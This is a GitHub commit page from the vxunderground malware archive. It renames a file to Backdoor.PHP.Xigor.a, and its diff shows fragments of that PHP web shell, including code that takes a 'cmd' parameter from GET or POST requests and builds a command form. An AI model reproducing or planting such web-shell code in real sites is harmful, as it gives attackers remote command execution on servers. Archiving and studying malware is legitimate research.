Rename Exploit.PHP.e to Backdoor.PHP.Xigor.a

This commit is contained in:
vxunderground 2020-10-30 00:29:47 -05:00 committed by GitHub
parent 9a7f02ca4a
commit 1b555e5244
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -295,7 +295,7 @@ elseif (@$_GET['action'] == 'save') {
}
}
// Informações
// Informações
$cmdget = '';
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
@ -312,7 +312,7 @@ elseif (@$_GET['action'] == 'save') {
echo "<form method=\"POST\" name=\"cmd\" action=\"{$fstring}&amp;action=cmd&amp;chdir=$chdir\">";
echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
echo "<legend>Informações</legend>";
echo "<legend>Informações</legend>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
echo "<tr>";
echo "<td width=\"8%\">";